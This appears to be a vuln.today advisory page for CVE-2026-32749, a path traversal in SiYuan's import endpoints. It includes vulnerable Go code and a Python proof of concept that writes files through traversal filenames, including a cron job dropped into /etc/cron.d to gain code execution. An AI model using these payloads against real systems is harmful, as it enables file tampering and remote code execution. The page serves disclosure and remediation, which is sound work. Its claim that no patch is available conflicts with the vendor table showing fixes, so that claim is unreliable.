Skip to main content

Python CVE-2026-32749

HIGH
Path Traversal (CWE-22)
2026-03-16 https://github.com/siyuan-note/siyuan GHSA-qvvf-q994-x79v
7.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.6 HIGH
AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N
SUSE
HIGH
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
High
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 16, 2026 - 20:05 vuln.today
CVE Published
Mar 16, 2026 - 18:47 nvd
HIGH 7.6

DescriptionGitHub Advisory

Summary

POST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE.

Details

File: kernel/api/import.go - functions importSY and importZipMd

go
file := files[0]

// ❌ file.Filename comes from the HTTP multipart header - fully user-controlled
writePath := filepath.Join(util.TempDir, "import", file.Filename)
// e.g. TempDir=/siyuan/workspace/temp, file.Filename="../../data/evil"
// → writePath = /siyuan/workspace/data/evil  (escapes temp/import/)

writer, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)

importZipMd has a second traversal in unzipPath construction:

go
filenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))
unzipPath    := filepath.Join(util.TempDir, "import", filenameMain)
gulu.Zip.Unzip(writePath, unzipPath)   // unzipPath also escapes TempDir

filepath.Join calls filepath.Clean internally, but cleaning happens after concatenation - sufficient ../ sequences escape the base directory entirely. The curl tool sanitizes ../ in multipart filenames, so exploitation requires sending the raw HTTP request via Python requests or a custom client.

PoC

Environment:

bash
docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

python
import requests, zipfile, io

HOST  = "http://localhost:6806"
TOKEN = "YOUR_ADMIN_TOKEN"
# from Settings → About → API Token
# Create a valid .sy.zip payload
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
    z.writestr("TestNB/20240101000000-abcdefg.sy",
        '{"ID":"20240101000000-abcdefg","Spec":"1","Type":"NodeDocument","Children":[]}')
    z.writestr("TestNB/.siyuan/sort.json", "{}")
buf.seek(0)
# Traversal filename - Python requests does NOT sanitize ../
r = requests.post(f"{HOST}/api/import/importSY",
    headers={"Authorization": f"Token {TOKEN}"},
    files={"file": ("../../data/TRAVERSAL_PROOF.zip", buf.read(), "application/zip")},
    data={"notebook": "YOUR_NOTEBOOK_ID", "toPath": "/"})

print(r.text)
# Returns: {"code":0,"msg":"","data":null}
# File was written to /siyuan/workspace/data/TRAVERSAL_PROOF.zip

RCE via cron (root container):

python
cron = b"* * * * * root touch /tmp/RCE_CONFIRMED\n"
r = requests.post(f"{HOST}/api/import/importSY",
    headers={"Authorization": f"Token {TOKEN}"},
    files={"file": ("../../../../../etc/cron.d/siyuan_poc", cron, "application/zip")},
    data={"notebook": "NOTEBOOK_ID", "toPath": "/"})
# cron executes on next minute → /tmp/RCE_CONFIRMED appears

Confirmed response on v3.6.0: {"code":0,"msg":"","data":null}

Impact

An admin can write arbitrary content to any path writable by the SiYuan process:

  • RCE via /etc/cron.d/ (root containers), ~/.bashrc, SSH authorized_keys
  • Data destruction by overwriting workspace or application files
  • In Docker containers running as root (common default), this grants full container compromise

AnalysisAI

Path traversal in Python and Docker import endpoints allows authenticated administrators to write files to arbitrary filesystem locations by injecting directory traversal sequences in multipart upload filenames, potentially enabling remote code execution through placement of malicious files in executable paths. The vulnerability affects the POST /api/import/importSY and POST /api/import/importZipMd endpoints which fail to sanitize user-supplied filenames before constructing file write paths. No patch is currently available.

Technical ContextAI

The vulnerability affects the Go-based SiYuan kernel (pkg:go/github.com_siyuan-note_siyuan_kernel) in the import functionality at /api/import/importSY and /api/import/importZipMd endpoints. This is a classic CWE-22 path traversal vulnerability where user-controlled multipart filename fields are passed directly to filepath.Join() without sanitization, allowing directory traversal sequences (../) to escape the intended temp directory. While filepath.Join() internally calls filepath.Clean(), the cleaning occurs after concatenation, making it ineffective against sufficient traversal sequences. The vulnerability requires bypassing typical client-side sanitization by tools like curl, necessitating raw HTTP requests via Python requests or similar libraries.

RemediationAI

Upgrade SiYuan to a version that addresses this vulnerability once a patch is released by monitoring the vendor advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-qvvf-q994-x79v. Until patching is available, restrict admin API access to trusted IP addresses only, avoid running SiYuan containers as root user, and implement strict file system permissions to limit write access. For Docker deployments, use a non-root user context and read-only root filesystems where possible to mitigate the impact of successful exploitation.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Vendor StatusVendor

SUSE

Severity: High
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-32749 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy